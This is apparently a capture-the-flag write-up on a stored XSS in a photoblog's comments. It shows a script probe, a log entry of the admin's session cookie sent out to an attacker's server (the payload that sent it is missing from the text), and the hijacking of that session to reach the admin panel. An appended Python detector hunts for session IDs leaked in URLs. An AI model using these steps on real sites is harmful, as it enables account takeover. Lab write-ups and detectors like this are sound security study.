A friend of mine has stolen my cat's picture on his blog. I want to log in as admin user on his blog. Do you have any idea?
The website to pwn is a photoblog where you can add comments on a cat picture.
By posting comments such as `<script>alert(123)</script>` we notice that there is an XSS vulnerability.
The admin panel is located at the address `admin.php`. However, when we try to access it we are redirected to `login.php`.
The XSS vulnerability can be used to get the admin's cookie in order to connect to `admin.php`.
After we posted the following comment
we got the following request in our logs.
```
22.214.171.124 - - [06/Feb/2016:14:52:07 +0100] "GET /pirate.png?loc=http://172.17.118.91:8083/privateindex.php?id=Quokka&cookie=PHPSESSID=515386866780b5f132fc96c02b3ddb82 HTTP/1.1" 404 142 "http://172.17.118.91:8083/privateindex.php?id=Quokka" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34"
```
The admin's `PHPSESSID` is `515386866780b5f132fc96c02b3ddb82`.
Once we have changed our cookie to this value, we can access `admin.php` and get the flag.
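
Seen from the defending side, a request like the one logged above is what to hunt for in proxy or web access logs: a session identifier travelling inside a URL. The following detector is an added example, not part of the original write-up; it assumes Combined Log Format, the list of cookie names is an assumption, and the second and third sample lines are constructed.

```python
import re
from urllib.parse import unquote

# Combined Log Format: host ident user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Session cookie names to look for (assumption: extend for your own stack).
SESSION_RE = re.compile(r'(PHPSESSID|JSESSIONID|ASP\.NET_SessionId)=([A-Za-z0-9,-]{16,128})')

# Line 1 is the request from the write-up; lines 2 and 3 are constructed samples.
SAMPLE_LOG = [
    '22.214.171.124 - - [06/Feb/2016:14:52:07 +0100] "GET /pirate.png?loc=http://172.17.118.91:8083/privateindex.php?id=Quokka&cookie=PHPSESSID=515386866780b5f132fc96c02b3ddb82 HTTP/1.1" 404 142 "http://172.17.118.91:8083/privateindex.php?id=Quokka" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34"',
    '203.0.113.7 - - [06/Feb/2016:14:53:10 +0100] "GET /index.php?id=Quokka HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [06/Feb/2016:15:01:44 +0100] "GET /p.gif?c=PHPSESSID%253D' + 'a' * 32
    + ' HTTP/1.1" 404 142 "http://blog.example/index.php" "Mozilla/5.0"',
]

def find_leaked_sessions(lines):
    """Return one finding per session identifier seen inside a request URL."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not Combined Log Format: skip rather than guess
        # Decode twice so single and double URL-encoding are both caught.
        target = unquote(unquote(m.group("target")))
        for name, value in SESSION_RE.findall(target):
            findings.append({
                "line": lineno,
                "time": m.group("time"),
                "cookie": name,
                "session_id": value,           # invalidate this session server-side
                "page": m.group("referer"),    # page that triggered the request
                "agent": m.group("agent"),
            })
    return findings

if __name__ == "__main__":
    for finding in find_leaked_sessions(SAMPLE_LOG):
        print(finding)
```

Each finding names the session to invalidate, and the referer points at the page whose stored comment should be reviewed.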